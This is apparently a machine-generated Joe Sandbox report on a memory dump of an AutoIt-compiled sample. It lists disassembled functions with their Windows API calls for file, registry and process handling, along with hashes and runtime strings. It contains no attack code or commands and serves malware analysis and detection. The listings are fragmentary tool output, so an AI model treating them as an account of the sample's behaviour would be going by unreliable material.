                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                      • String ID: 0$`$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas$s
                                                                                                                                                      • API String ID: 683915450-504931051
                                                                                                                                                      • Opcode ID: 7f0e26c7b2c0627dcaf21bbb2732ea190406ee769e349e0ae01564cf14b7df15
                                                                                                                                                      • Instruction ID: 5a256ca5e313c3fdaf7f5b16fe1eacca4f2a15a983fc92fab58510e82454b25f
                                                                                                                                                      • Opcode Fuzzy Hash: 7f0e26c7b2c0627dcaf21bbb2732ea190406ee769e349e0ae01564cf14b7df15
                                                                                                                                                      • Instruction Fuzzy Hash: 3B51D330148387AECB16EF60EC5DD6B7FE9BFD0714F40582DF581921A2DA748A49E722

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,75568FB0,?,00000000), ref: 005A9FC0
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 005A9FFE
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,?), ref: 005AA018
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,?), ref: 005AA030
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA03B
                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 005AA057
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005AA0A7
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(005F7B94), ref: 005AA0C5
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 005AA0CF
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA0DC
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA0EC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                                                      • Opcode ID: 442c8bd04b876d645e81a755c476fd51780da3c488fc0b0f300f876ba4e05638
                                                                                                                                                      • Instruction ID: 1845098c3de81b925a958075d33cd55d77d34aa5d707e5c4233ff404016e5bf7
                                                                                                                                                      • Opcode Fuzzy Hash: 442c8bd04b876d645e81a755c476fd51780da3c488fc0b0f300f876ba4e05638
                                                                                                                                                      • Instruction Fuzzy Hash: 3631B23660161D6EDB109FA4DC4DEEE7BBCBF4A320F1040A5E915E3090EB34DA48DA61

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                        • Part of subcall function 0059E9C5: GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0059D8E2
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0059D99D
                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0059D9B0
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0059D9CD
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0059D9F7
                                                                                                                                                        • Part of subcall function 0059DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0059D9DC,?,?), ref: 0059DA72
                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0059DA13
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059DA24
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                      • String ID: \*.*
                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                      • Opcode ID: 4e370c04815d83f26e76c37507993c43e66121a113292c5e8e2129dfe17b9c5c
                                                                                                                                                      • Instruction ID: 0ad69d8638989448622964abac99dde5a15334bfbbe367cf4fc497def562d155
                                                                                                                                                      • Opcode Fuzzy Hash: 4e370c04815d83f26e76c37507993c43e66121a113292c5e8e2129dfe17b9c5c
                                                                                                                                                      • Instruction Fuzzy Hash: 14616D3180114EAFDF01EBA0DA46AEDBFB5BF55300F244069E406B7192EB316F09DB60
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                        • Part of subcall function 0059E9C5: GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0059DBE0
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,?), ref: 0059DC30
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0059DC41
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059DC58
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059DC61
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                      • String ID: \*.*
                                                                                                                                                      • API String ID: 2649000838-1173974218
• Opcode ID: 58ca673259f87bca51e2acb212dcd08db17117d4cb8d9054154d22ab88e79d97
• Instruction ID: 3278f63895ea93b2e5e1ea80caa0ed7b88fb7e1e41c06343e8e9a24436b46cf2
• Opcode Fuzzy Hash: 58ca673259f87bca51e2acb212dcd08db17117d4cb8d9054154d22ab88e79d97
• Instruction Fuzzy Hash: CF318031008386AFC701EF64C8959AFBBF8BE95300F444D2DF5D2921A1EB61DE09DB62
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0059DCC1
• Process32FirstW.KERNEL32(00000000,?), ref: 0059DCCF
• Process32NextW.KERNEL32(00000000,?), ref: 0059DCEF
• CloseHandle.KERNELBASE(00000000), ref: 0059DD9C
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: fb7d8d982fc458a986983ad3cb38f36c721655dd99dba7fa2adc7d31c536f5f4
• Instruction ID: 457b69408d1123036f4ac6084e247cd2d16ae39c901e1f6a0d011ec0679129bd
• Opcode Fuzzy Hash: fb7d8d982fc458a986983ad3cb38f36c721655dd99dba7fa2adc7d31c536f5f4
• Instruction Fuzzy Hash: 3D314C711083419FD701EF64D885BAABFF8BF99350F04092DF581861A1EB719949CBA2
APIs
• lstrlenW.KERNEL32(?,00574686), ref: 0059E397
• GetFileAttributesW.KERNELBASE(?), ref: 0059E3A6
• FindFirstFileW.KERNELBASE(?,?), ref: 0059E3B7
• FindClose.KERNEL32(00000000), ref: 0059E3C3
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: 317d0ecebafb1d28e4e32fa5ed08cb8926feffedd778da310d3bd68cc0c760bd
• Instruction ID: e7efb10ce71bfd9f35c3433df131fc2ff3543b30a698468966189c59ea36e5a5
• Opcode Fuzzy Hash: 317d0ecebafb1d28e4e32fa5ed08cb8926feffedd778da310d3bd68cc0c760bd
• Instruction Fuzzy Hash: EFF0A0314119106B8611A738EC0E8AA7BBCAE41335B104B25F836C20F0DBB0B99996A5
APIs
• GetCurrentProcess.KERNEL32(?,?,0055504E,?,005F98D8,0000000C,005551A5,?,00000002,00000000), ref: 00555099
• TerminateProcess.KERNEL32(00000000,?,0055504E,?,005F98D8,0000000C,005551A5,?,00000002,00000000), ref: 005550A0
• ExitProcess.KERNEL32 ref: 005550B2
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 17f280fa7c24b5d7b13388c18f369ee8d8727b60dfead2f058f3e1645a1f16fc
• Instruction ID: e2a78b8b8f57cffdd3a18dc6881d60ce255415ead37cde8daddf2978a8d3e031
• Opcode Fuzzy Hash: 17f280fa7c24b5d7b13388c18f369ee8d8727b60dfead2f058f3e1645a1f16fc
• Instruction Fuzzy Hash: C1E09231401948AFCB216F54DD2DE583F79BB90782F044429F8058A572EB36DA4ADAA0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 0058E60A
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: 1d143fff5f882cdfdd2fa928425e3018b209887b4d394c47f75380a6fbcfb67e
• Instruction ID: 149618b626ef62519bbc524952083294933686aed9a24ad6f24366a782ed8374
• Opcode Fuzzy Hash: 1d143fff5f882cdfdd2fa928425e3018b209887b4d394c47f75380a6fbcfb67e
• Instruction Fuzzy Hash: CED0C9B480111DEACF90CB90EC8CDDD777CBB14304F100565F506F2000E77095499B20

Control-flow Graph

(Rendered graph in the original report. Basic blocks 5bcd16 through 5bd2f2; API calls appearing as graph nodes: RegConnectRegistryW, RegCreateKeyExW, RegSetValueExW, RegCloseKey. Legend: Executed / Not Executed.)
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BCE1C
• RegCreateKeyExW.KERNELBASE(?,?,00000000,005CDCD0,00000000,?,00000000,?,?), ref: 005BCEA3
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 005BCF03
• _wcslen.LIBCMT ref: 005BCF53
• _wcslen.LIBCMT ref: 005BCFCE
• RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 005BD011
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 005BD120
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 005BD1AC
• RegCloseKey.KERNELBASE(?), ref: 005BD1E0
• RegCloseKey.ADVAPI32(00000000), ref: 005BD1ED
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 005BD2BF
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 8d54bc00413d6260e5597b7992d55b3fb2c5758282ee669f84f46b5f7d699c5b
• Instruction ID: f9a2a7d2d8d2c52f34a82b62e0c33c0608f40004af54aa12b5a63f88fcdb4a13
• Opcode Fuzzy Hash: 8d54bc00413d6260e5597b7992d55b3fb2c5758282ee669f84f46b5f7d699c5b
• Instruction Fuzzy Hash: 4D1247352046029FDB14DF18C885A6ABBF5BF88714F04885DF98A9B3A2DB31FD41CB91

Control-flow Graph

(Rendered graph in the original report. Basic blocks 533e15 through 533fb3 and 574585 through 574706; the graph nodes call internal subroutines only, no imported APIs. Legend: Executed / Not Executed.)
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID:
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 0-1645009161
• Opcode ID: 32717c806c4b37de84100d63316ccdeab19cbd58e555321a0b3eb7aa3910a0a8
• Instruction ID: 034e2650c6c7f9ebef0baee2da0b06a96351717a5ce5c32e58699d15396edf15
• Opcode Fuzzy Hash: 32717c806c4b37de84100d63316ccdeab19cbd58e555321a0b3eb7aa3910a0a8
• Instruction Fuzzy Hash: F9810471A40207BBDB10AF60DC5AFAE3F68BF45740F004025FD09AA192EB74DA15DBA1

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00535539
                                                                                                                                                        • Part of subcall function 005351BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005351E1
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0053534B
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00574BD7
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00574C18
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00574C5A
                                                                                                                                                      • _wcslen.LIBCMT ref: 00574CC1
                                                                                                                                                      • _wcslen.LIBCMT ref: 00574CD0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                      • String ID: 8c$Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                      • API String ID: 98802146-153239285
                                                                                                                                                      • Opcode ID: 864e199d14f325155d747a3eba2d23fe2b5e449c09866800d5ff1c800ff0242b
                                                                                                                                                      • Instruction ID: 11838658764acc05d13c15be180266a0803a723b47063e6948bb346ca3803175
                                                                                                                                                      • Opcode Fuzzy Hash: 864e199d14f325155d747a3eba2d23fe2b5e449c09866800d5ff1c800ff0242b
                                                                                                                                                      • Instruction Fuzzy Hash: 0B717D71144351AEC708DF65E88995BBFEDFF88341F40682EF544C72A1EB719A48CB52

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00533690,?,?), ref: 005336FE
                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00533690,?,?), ref: 0053372A
                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0053374D
                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00533690,?,?), ref: 00533758
                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0053376C
                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0053378D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                      • String ID: 0$`$0$`$TaskbarCreated
                                                                                                                                                      • API String ID: 129472671-2757650357
                                                                                                                                                      • Opcode ID: b3b3a8d2f0feec23a9259aff99e6f832bda4579b78bcaf63c978f92e9e3d595f
                                                                                                                                                      • Instruction ID: 911d359a3bd370cab238f9ba5559435b30b1ed13fc3b5c0abb271b5cb29b5f7f
                                                                                                                                                      • Opcode Fuzzy Hash: b3b3a8d2f0feec23a9259aff99e6f832bda4579b78bcaf63c978f92e9e3d595f
                                                                                                                                                      • Instruction Fuzzy Hash: F54125B1144242BFDB281B78DC5EB7A3F6AFB40360F005229F516CA2A1DB759F01A761

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 005335DE
                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00533608
                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00533619
                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00533636
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00533646
                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 0053365C
                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0053366B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                      • Opcode ID: d42905b5ac6a9b7f2dc826a1d6a6cfa13955c8b631de5c10c3c9aaab16182bf6
                                                                                                                                                      • Instruction ID: f5a6950cc7c56c71a4e46eeb8fd661fc1305fa968615d56ec1f241dd9fe505dc
                                                                                                                                                      • Opcode Fuzzy Hash: d42905b5ac6a9b7f2dc826a1d6a6cfa13955c8b631de5c10c3c9aaab16182bf6
                                                                                                                                                      • Instruction Fuzzy Hash: 3A21E0B1941319AFDB00DFA5EC89B9EBBF5FB08700F00512AF611E62A0D7B45545DFA0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0057073A: CreateFileW.KERNELBASE(00000000,00000000,?,00570AA4,?,?,00000000,?,00570AA4,00000000,0000000C), ref: 00570757
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00570B0F
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00570B16
                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00570B22
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00570B2C
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00570B35
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00570B55
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00570C9F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00570CD1
                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00570CD8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                      • String ID: H
                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                      • Opcode ID: 914af0c7b42711c4c82e2e887d26b751614341bcf0ce2277e7ec0e93ba3c3e1a
                                                                                                                                                      • Instruction ID: 6037256a109de17f7ae9a1a92be15ee876fb74172495b70e234836d7d1813d2b
                                                                                                                                                      • Opcode Fuzzy Hash: 914af0c7b42711c4c82e2e887d26b751614341bcf0ce2277e7ec0e93ba3c3e1a
                                                                                                                                                      • Instruction Fuzzy Hash: 1DA14332A002458FCF19AF68E856BAE7FE1BB46324F14515DF809DF2E1DB309902DB51

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00533465
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00533474
                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 0053348A
                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 0053349C
                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 005334AE
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005334C6
• RegisterClassExW.USER32(?), ref: 00533517
  • Part of subcall function 005335AB: GetSysColorBrush.USER32(0000000F), ref: 005335DE
  • Part of subcall function 005335AB: RegisterClassExW.USER32(00000030), ref: 00533608
  • Part of subcall function 005335AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00533619
  • Part of subcall function 005335AB: InitCommonControlsEx.COMCTL32(?), ref: 00533636
